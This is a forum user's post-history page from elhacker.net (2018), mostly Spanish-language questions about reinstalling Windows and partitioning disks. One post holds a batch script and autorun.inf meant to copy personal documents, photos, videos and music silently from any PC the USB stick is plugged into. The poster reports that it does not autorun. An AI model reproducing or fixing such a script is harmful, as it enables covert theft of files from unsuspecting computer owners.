elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Mensajes
Páginas: 1 ... 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 [19] 20 21 22 23 24 25 26 27 28 29
181  Sistemas Operativos / Windows / Re: Error al hacer USB autoejecutable con Autorun en: 23 Julio 2018, 19:41 pm
Ok gracias, mi sistema operativo es Windows 10 pro, se puede hacer de otra forma? El autoejecutable. O con algún tipo de lenguaje de programacion.
182  Sistemas Operativos / Windows / Error al hacer USB autoejecutable con Autorun en: 23 Julio 2018, 19:15 pm
Lo estoy intentando hacer un USB autoejecutable que solamente al conectar el USB me copie los de la PC a la que esta conectada, para eso hice el programa bat:

Código:
@echo off
IF EXIST ".\cosas\"%USERNAME% MD ".\berta\"%USERNAME%
cd ".\berta\
for /R %USERPROFILE%\Pictures\ %%x in (*.pdf,*.odt,*.docx,*.doc,*.xlsx,*.xls,*.pptx,*.xml,*.mht,*.ods,*.odp,*.odb,*.odg,*.bmp,*.gif,*.jpg,*.jpeg,*.tiff,*.tif,*.png,*.svg,*.psd,*.asf,*.avi,*.mp4,*.m4v,*.mov,*.swf,*.wmv,*.mpg,*.mpeg,*.wav,*.wma,*.mkv,) do copy "%%x" ".\"
for /R %USERPROFILE%\Desktop\ %%x in (*.pdf,*.odt,*.docx,*.doc,*.xlsx,*.xls,*.pptx,*.xml,*.mht,*.ods,*.odp,*.odb,*.odg,*.bmp,*.gif,*.jpg,*.jpeg,*.tiff,*.tif,*.png,*.svg,*.psd,*.asf,*.avi,*.mp4,*.m4v,*.mov,*.swf,*.wmv,*.mpg,*.mpeg,*.wav,*.wma,*.mkv,) do copy "%%x" ".\"
for /R %USERPROFILE%\Videos\ %%x in (*.pdf,*.odt,*.docx,*.doc,*.xlsx,*.xls,*.pptx,*.xml,*.mht,*.ods,*.odp,*.odb,*.odg,*.bmp,*.gif,*.jpg,*.jpeg,*.tiff,*.tif,*.png,*.svg,*.psd,*.asf,*.avi,*.mp4,*.m4v,*.mov,*.swf,*.wmv,*.mpg,*.mpeg,*.wav,*.wma,*.mkv,) do copy "%%x" ".\"
for /R %USERPROFILE%\Documents\ %%x in (*.pdf,*.odt,*.docx,*.doc,*.xlsx,*.xls,*.pptx,*.xml,*.mht,*.ods,*.odp,*.odb,*.odg,*.bmp,*.gif,*.jpg,*.jpeg,*.tiff,*.tif,*.png,*.svg,*.psd,*.asf,*.avi,*.mp4,*.m4v,*.mov,*.swf,*.wmv,*.mpg,*.mpeg,*.wav,*.wma,*.mkv,) do copy "%%x" ".\"
for /R %USERPROFILE%\Music\ %%x in (*.pdf,*.odt,*.docx,*.doc,*.xlsx,*.xls,*.pptx,*.xml,*.mht,*.ods,*.odp,*.odb,*.odg,*.bmp,*.gif,*.jpg,*.jpeg,*.tiff,*.tif,*.png,*.svg,*.psd,*.asf,*.avi,*.mp4,*.m4v,*.mov,*.swf,*.wmv,*.mpg,*.mpeg,*.wav,*.wma,*.mkv,) do copy "%%x" ".\"
pause
EXIT

El archivo funciona, pero necessito que se ejecute automáticamente, para ello hice el archivo autorun.inf:
Código:
[Autorun]
open = guardar.bat

Quito el USB y lo vuelvo a poner y en teoría me tendría que salir el programa bat ejecutándose pero no hace eso, y no se cual es el problema, ya que en YouTube cuando lo veo, parece funcionar.

Gracias

P.D: Lo probé conviertiendo el .bat en .exe y tampoco funciona.
183  Sistemas Operativos / Windows / Re: Se puede abrir cmd desde la BIOS de windows 7? en: 22 Julio 2018, 23:58 pm
ni por el carajo! XD


la BIOS es su propio sistema operativo y está aislado, cmd requiere que todo el kernel de windows esté ejecutandose

OK, gracias
184  Sistemas Operativos / Windows / Se puede abrir cmd desde la bios de windows 7? en: 22 Julio 2018, 23:28 pm
Hola, preguntaba si al entrar en la BIOS se puede abrir la consola en windows 7, para ejecutar un programa, gracias.
185  Sistemas Operativos / Windows / Re: Error al instalar Windows 10 pro en Windows 7 starter - packard bell en: 19 Julio 2018, 16:59 pm
Ya esta solucionado!

El problema era que al reiniciarse después de la instalacion, no sacaba el USB y que además esta PC hiba muy lento, para iniciar la configuracion de windows 10.

Gracias.
186  Sistemas Operativos / Windows / Re: Error al instalar Windows 10 pro en Windows 7 starter - packard bell en: 17 Julio 2018, 11:59 am
Hola, no se sabe exactamente que hiciste....no lo cuentas.

Lo primero que deberias hacer es con un Live CD de Gparted borrar la partición actual del HDD del aparato, crear nuna nueva, primaria, en NTSF y formatear.

Despues de eso, con una ISO de Windows 10 Pro, oficial, crear un pen autoarrancable con Rufus , y con ese pen proceder a una instalación limpia, practicamente todos los drivers necesarios se cargaran por defecto, si te faltase alguno se busca con DRP 17 o en la pagina oficial de la marce del portatil.

No deberias tener ningún problema..... ;)


Saludos.

Hola, el problema esque no tengo ningún sistema operativo en la PC, eso que dice se puede hacer con el programa de instalacion de windows? Que elimine el disco duro HDD y que me cree una nueva particion primaria.

Nosotros lo que hicimos fue dos cosas:
1º:
En el apartado de particiones nos salia:
   - Partición de recuperación del sistema, la cual no nos deja instalar el sistema operativo.
   - Partición disco duro 0, donde si nos deajba.
  Eliminamos ambas particiones y nos salia uno donde queríamos instalar el S.O

En la partición disco duro 0 (creo que era algo así), por la cual nos dejaba instalarlo, lo instalamos allí.

En fin que no funciona y según lo que me ha dicho. ¿Si creo una nueva partición primaria, es decir, elimino todo y después creo otra partición por la cual nos deja instalarlo, funcionaria?
187  Sistemas Operativos / Windows / Error al instalar Windows 10 pro en Windows 7 starter - packard bell en: 16 Julio 2018, 18:41 pm
Hola,  fui a casa de un amigo a instalarle el windows 10 pro en su portátil de windows 8 starter, ya que le hiba muy lento y quería actualizarlo a otro windows. Todo fue bien desde la USB, pero al la hora de la instalación, todo fue bien, tanto instalación como actualizaciones, pero en las actualizaciones no me chequeó 'actualizaciones' y se me cargaba una cosa y después  volvía a reiniciarse el ordenador empezando todo de nuevo y así tantas veces como quieras.
188  Sistemas Operativos / Windows / Re: Eliminé el disco local C, no tengo sistema operativo, y no me deja instalarlo en: 10 Julio 2018, 15:24 pm
Primero que nada... la partición donde debes instalar es la 3, ya tu la señalaste e intentaste instalar allí tu Windows???...

Sobre lo de empezar de cero es así; las particiones 1 2 y 3 las eliminas como te señalé, entonces te quedara una sola sin formateo ni nada... allí es donde le das a CREAR y se te crearan nuevamente 3 particiones quedando señalada la donde ira el Windows y te aparecera el boton de SIGUIENTE... hay le das y se te instalara Windows...

 :rolleyes: :o :rolleyes: Ya está instalado.

Suerte.

Muchas gracias!!  :D
189  Sistemas Operativos / Windows / Re: Eliminé el disco local C, no tengo sistema operativo, y no me deja instalarlo en: 10 Julio 2018, 13:54 pm
No te sale abajo algo que dice OPCIONES DE UNIDAD???



Señala la partición 3 y dale a ELIMINAR, luego a la 2 y por ultimo elimina la 1, despues le das a CREAR...

En la partición 3 es donde debes intentar la instalación..

 :rolleyes: :o :rolleyes:
Hola, es decir,  tengo que eliminar las particiones 1, 2 y 3 y después crear una partición nueva donde instalarlo? O eliminar las particiones 1,2 y en la 3 instalarlo?
190  Sistemas Operativos / Windows / Re: Eliminé el disco local C, no tengo sistema operativo, y no me deja instalarlo en: 10 Julio 2018, 12:44 pm
Mete el pendrive con Windows 10 y empieza tu instalación, cuando llegues  al cuadro de las particiones del disco dale abajo donde dice CREAR...

 :rolleyes: :o :rolleyes:

Saludos.
El problema es que no me deja. Se puede ir al BIOS abrir el CMD y crear un nuevo disco duro partición?
Unas imágenes:
https://drive.google.com/file/d/1U_8BNAti5JJGzO6ojY803KBGX72PPFLe/view?usp=drivesdk
https://drive.google.com/file/d/1ivWHFb3WXgSGGZitvlZBS348444seHAI/view?usp=drivesdk
Páginas: 1 ... 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 [19] 20 21 22 23 24 25 26 27 28 29
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines